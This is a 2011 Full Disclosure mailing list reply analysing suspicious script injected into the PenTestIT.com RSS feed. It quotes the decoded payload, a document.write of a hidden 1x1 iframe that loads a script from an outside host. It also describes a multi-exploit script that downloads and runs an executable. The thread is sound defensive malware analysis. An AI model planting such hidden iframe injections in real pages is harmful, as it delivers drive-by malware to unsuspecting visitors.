Full Disclosure mailing list archives
Re: PenTestIT.com RSS feed suspicius
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 06 Jul 2011 15:55:03 +1200
Andrew Farmer to ector dulac:
Looks suspicious to meVery. That unescapes to: document.write('<iframe src="http://innessphoto.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>') Which loads some amusingly obfuscated JS ...
Really? That amused you? Maybe my irony detector is on the blink, but that was very ordinary several years ago.
... which looks like it's *supposed* to be a plugin exploit of some sort, but which has no real payload. At least, not when I looked.
Ummmm -- not what I got at all. I got a very old, very common multi-exploit script that, if successful, (that is, if run on a sufficiently old, sufficiently unpatched, system) would have downloaded and executed a PE that was only just very recently (a bit less than three hours ago) submitted to VirusTotal, with these results: http://www.virustotal.com/file-scan/report.html?id=9a68644038cb4f6a0b3b2057c5cdf5a22898675ebc20baedc601dfc94d9fa3e1-1309914305 Of course, what you get served from any given "exploit script" URL can vary greatly, from hour-to-hour, GeoIP-to-GeoIP, and equally amongst apparent browser User-Agents (including OS (OS x vs. Windows vs. others) and even OS version (XP vs. Vista/Win7), etc), HTTP referer headers, presence or absense or contents of cookies, and so on and so forth... Regards, Nick FitzGerald _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PenTestIT.com RSS feed suspicius ector dulac (Jul 05)
- Re: PenTestIT.com RSS feed suspicius Andrew Farmer (Jul 05)
- Re: PenTestIT.com RSS feed suspicius Nick FitzGerald (Jul 05)
- Re: PenTestIT.com RSS feed suspicius Andrew Farmer (Jul 05)
- Re: PenTestIT.com RSS feed suspicius Nick FitzGerald (Jul 05)
- Re: PenTestIT.com RSS feed suspicius The Security Community (Jul 05)
- Re: PenTestIT.com RSS feed suspicius The Security Community (Jul 05)
- <Possible follow-ups>
- Re: PenTestIT.com RSS feed suspicius Metahuman (Jul 06)
- Re: PenTestIT.com RSS feed suspicius Andrew Farmer (Jul 05)